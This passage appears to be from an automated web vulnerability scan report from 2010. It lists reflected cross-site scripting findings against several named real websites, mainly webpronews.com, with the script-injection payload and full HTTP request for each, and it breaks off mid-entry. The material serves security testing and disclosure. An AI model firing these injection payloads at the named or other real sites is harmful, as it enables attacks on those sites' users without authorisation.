HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:59:26 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=49baaa3aea84df7129961856f61b65ce; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48368
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>THNIC : Begin Your Success</title> <me ...[SNIP]... <a href='/index.php?44ae9'><script>alert(1)</script>9db8ec12eb3=1&new_language=1'> ...[SNIP]...
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a2c25'><script>alert(1)</script>e81400e2623 was submitted in the page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?page=policya2c25'><script>alert(1)</script>e81400e2623 HTTP/1.1 Host: www.thnic.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:59:35 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=6017dfd5dfbed67900ed35f958a714ae; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48363
...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>THNIC : Begin Your Success</title> <me ...[SNIP]... <a href='/index.php?page=policya2c25'><script>alert(1)</script>e81400e2623&new_language=1'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f5bb<script>alert(1)</script>3a9fb58ff8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq.htm1f5bb<script>alert(1)</script>3a9fb58ff8f HTTP/1.1 Host: www.tonic.to Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 01:54:20 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 69
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 237be<script>alert(1)</script>47ebb11e311 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /faq.htm237be<script>alert(1)</script>47ebb11e311 HTTP/1.1 Host: www.vunic.vu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:05:05 GMT Server: Apache/2.0.49 (Unix) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 69
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e29ee%20a%3db3a4ec9bbad8 was submitted in the REST URL parameter 1. This input was echoed as e29ee a=b3a4ec9bbad8 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etailusaeaste29ee%20a%3db3a4ec9bbad8/ HTTP/1.1 Host: www.wbresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:06:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.wbresearch.com&SiteLanguage=1033; path=/ Set-Cookie: ASP.NET_SessionId=fkbwoe45wgiga045hcbxa2vx; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36866
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f8351%20a%3db39f7a5ea6ae was submitted in the REST URL parameter 1. This input was echoed as f8351 a=b39f7a5ea6ae in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /luxuryinteractivef8351%20a%3db39f7a5ea6ae/agenda_main_full2.asp HTTP/1.1 Host: www.wbresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:06:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.wbresearch.com&SiteLanguage=1033; path=/ Set-Cookie: ASP.NET_SessionId=3wymaje20jlcuf2yy5zas1mn; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36892
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f2ef6%20a%3db5edbd6eed74 was submitted in the REST URL parameter 2. This input was echoed as f2ef6 a=b5edbd6eed74 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /luxuryinteractive/f2ef6%20a%3db5edbd6eed74 HTTP/1.1 Host: www.wbresearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Sat, 11 Dec 2010 02:06:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.wbresearch.com&SiteLanguage=1033; path=/ Set-Cookie: ASP.NET_SessionId=3mnxfl3ufxhafyzlzdbsh255; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 36872
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b993"><script>alert(1)</script>51942b18704 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews5b993"><script>alert(1)</script>51942b18704/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:06:16 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=fhq7e24q8im9dcvke1ea01ios2; expires=Mon, 03 Jan 2011 05:39:36 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14308
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa17"><script>alert(1)</script>a889397c2d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008afa17"><script>alert(1)</script>a889397c2d7/06/19/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:16 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=fgj559actlq22gflvbf493gts0; expires=Mon, 03 Jan 2011 05:39:36 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38517
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc55f"><script>alert(1)</script>e2a2c44ff5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06dc55f"><script>alert(1)</script>e2a2c44ff5/19/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:18 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=ltuinoebsggvnq1mbnm6p9qom2; expires=Mon, 03 Jan 2011 05:39:38 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38505
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a15d"><script>alert(1)</script>6410cb113da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/196a15d"><script>alert(1)</script>6410cb113da/domain-kiting-ppc-abuse-dropping-in-tandem HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:20 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=mhjr1p3ld7qgv5213b1fso0be0; expires=Mon, 03 Jan 2011 05:39:40 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38543
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613ef"><script>alert(1)</script>12fa6739341 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem613ef"><script>alert(1)</script>12fa6739341 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:21 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=1iv153hcejag2i76bfmgpoo696; expires=Mon, 03 Jan 2011 05:39:41 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:21 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38543
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.206. http://www.webpronews.com/topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef9c7"><script>alert(1)</script>517f94ec52d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem?ef9c7"><script>alert(1)</script>517f94ec52d=1 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:15 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=m1qs6rhdhhrbtsloujbagujuh0; expires=Mon, 03 Jan 2011 05:39:35 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39164
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.207. http://www.webpronews.com/topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105e8"><script>alert(1)</script>968ed48d3d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2008/06/19/domain-kiting-ppc-abuse-dropping-in-tandem?105e8"><script>alert(1)</script>968ed48d3d3=1 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:14 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=d1opiougl0vmprnl8f82l838h5; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39137
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f67fb"><script>alert(1)</script>c0f56f28c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnewsf67fb"><script>alert(1)</script>c0f56f28c51/2009/03/09/online-brand-abuse-continues-to-grow HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:06:14 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=tbe1gos9286hlj3dhf06eercb4; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14270
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcae7"><script>alert(1)</script>cd340866dca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009bcae7"><script>alert(1)</script>cd340866dca/03/09/online-brand-abuse-continues-to-grow HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:15 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=o7t46mknpidpp15iucq2n18uc4; expires=Mon, 03 Jan 2011 05:39:35 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:15 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38445
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae600"><script>alert(1)</script>4acdae22343 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03ae600"><script>alert(1)</script>4acdae22343/09/online-brand-abuse-continues-to-grow HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:17 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=9h6s831fvhjphb6isj1e7r3ba6; expires=Mon, 03 Jan 2011 05:39:37 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:17 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38445
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bb8"><script>alert(1)</script>8119496d581 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/0997bb8"><script>alert(1)</script>8119496d581/online-brand-abuse-continues-to-grow HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:18 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=lapgaf0ar0p9gnn9duf87e1187; expires=Mon, 03 Jan 2011 05:39:38 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38471
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b7a"><script>alert(1)</script>4d3654c44d0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/09/online-brand-abuse-continues-to-grow36b7a"><script>alert(1)</script>4d3654c44d0 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:20 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=cdt4m2t7nsb1vjhr02fcb90oh1; expires=Mon, 03 Jan 2011 05:39:40 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38471
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.213. http://www.webpronews.com/topnews/2009/03/09/online-brand-abuse-continues-to-grow [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef1f"><script>alert(1)</script>b1bb77f367b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/09/online-brand-abuse-continues-to-grow?8ef1f"><script>alert(1)</script>b1bb77f367b=1 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:13 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=vuem3aptrgel9ove7nb7md46d0; expires=Mon, 03 Jan 2011 05:39:33 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:13 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40246
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
1.214. http://www.webpronews.com/topnews/2009/03/09/online-brand-abuse-continues-to-grow [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc79"><script>alert(1)</script>c9ad7af4d66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/2009/03/09/online-brand-abuse-continues-to-grow?5fc79"><script>alert(1)</script>c9ad7af4d66=1 HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:06:14 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=7o6308te5bh6umslmj46ourtk5; expires=Mon, 03 Jan 2011 05:39:34 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:14 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40246
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ce2"><script>alert(1)</script>50c86e627bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews61ce2"><script>alert(1)</script>50c86e627bb/2009/05/26/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:06:22 GMT Server: Apache/2.2.8 (Fedora) X-Powered-By: PHP/5.1.6 Set-Cookie: SESS61a31155ac0d11a8e8770db90ed83372=1mnlmbhja69o862bfbl8o4q8o6; expires=Mon, 03 Jan 2011 05:39:42 GMT; path=/; domain=.webpronews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 11 Dec 2010 02:06:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 14292
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a92a"><script>alert(1)</script>284acf19bf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /topnews/20098a92a"><script>alert(1)</script>284acf19bf7/05/26/online-brand-fraud-poses-challenge-to-marketers HTTP/1.1 Host: www.webpronews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
